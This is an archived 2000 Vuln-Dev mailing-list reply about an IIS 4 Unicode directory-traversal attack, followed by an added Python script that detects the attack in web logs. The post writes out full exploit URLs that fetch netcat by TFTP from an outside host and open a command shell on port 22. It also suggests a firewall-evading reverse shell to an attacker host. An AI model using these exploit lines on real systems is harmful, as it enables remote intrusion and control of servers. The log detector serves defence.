Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: "Bluefish (P.Magnusson)" <11a () GMX NET>
Date: Wed, 15 Nov 2000 14:01:38 +0100
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe
So after this, there is a port open (22 in this case as many admins will leave this open for SSH, but this is an NT box, which as we know rarely has SSH running on it) that I can telnet to and have a command prompt.
A more reliable attack, though, would be to download and execute a client which connects to www.attacker.com:80, only port 80 won't be running a webserver but a server for the client. That way it will overcome more firewalls; only an application level firewall or a closed DMZ would cause problems, whereas the attack you describe relies on some server port not being firewalled.
..:::::::::::::::::::::::::::::::::::::::::::::::::..
http://www.11a.nu || http://bluefish.11a.nu
eleventh alliance development & security team
http://www.eff.org/cafe
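
Added example, not part of the original message: a log check for the request pattern quoted above, where `%c0%af` is an overlong UTF-8 encoding of `/` that slips past a traversal check made before decoding. It generalizes to any overlong 2- or 3-byte encoding of an ASCII character; the log layout, addresses and function names are constructed for illustration.

```python
import re

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")

# Constructed sample: date time c-ip method uri-stem uri-query status (assumed layout)
SAMPLE_LOG = """\
2000-11-15 13:01:02 192.0.2.10 GET /default.asp - 200
2000-11-15 13:01:09 192.0.2.44 GET /caf%c3%a9/menu.htm - 200
2000-11-15 13:02:11 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
"""

def pct_decode(raw: bytes) -> bytes:
    """Decode %XX escapes exactly once; other bytes pass through."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), raw)

def fold_overlong(data: bytes):
    """Replace overlong 2-/3-byte UTF-8 forms of ASCII with the ASCII byte.
    Returns (folded_bytes, number_of_overlong_sequences)."""
    out, n, i = bytearray(), 0, 0
    while i < len(data):
        b, rest = data[i], data[i + 1:i + 3]
        # Lead bytes C0/C1 can only encode U+0000..U+007F, so they are always overlong.
        if b in (0xC0, 0xC1) and rest and rest[0] & 0xC0 == 0x80:
            out.append(((b & 0x01) << 6) | (rest[0] & 0x3F)); n += 1; i += 2
        # E0 80/81 xx is the 3-byte overlong form of the same range.
        elif b == 0xE0 and len(rest) == 2 and rest[0] in (0x80, 0x81) and rest[1] & 0xC0 == 0x80:
            out.append(((rest[0] & 0x01) << 6) | (rest[1] & 0x3F)); n += 1; i += 3
        else:
            out.append(b); i += 1
    return bytes(out), n

def inspect_uri(stem: str) -> list:
    """Return findings for one request path, judged after folding overlong forms."""
    folded, n = fold_overlong(pct_decode(stem.encode("latin-1", "replace")))
    path = folded.lower().replace(b"\\", b"/")
    findings = []
    if n:
        findings.append("overlong-utf8")
    if b"/../" in path or path.endswith(b"/.."):
        findings.append("traversal")
    if path.endswith(b"/cmd.exe"):
        findings.append("shell-binary")
    return findings

def scan(log_text: str) -> list:
    """Return (client_ip, findings) for every log line with at least one finding."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) == 7 and not line.startswith("#") and inspect_uri(f[4]):
            hits.append((f[2], inspect_uri(f[4])))
    return hits

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ",".join(findings))
```

The legitimate two-byte sequence `%c3%a9` in the second sample line is not flagged, because only lead bytes that cannot encode anything outside ASCII are treated as overlong.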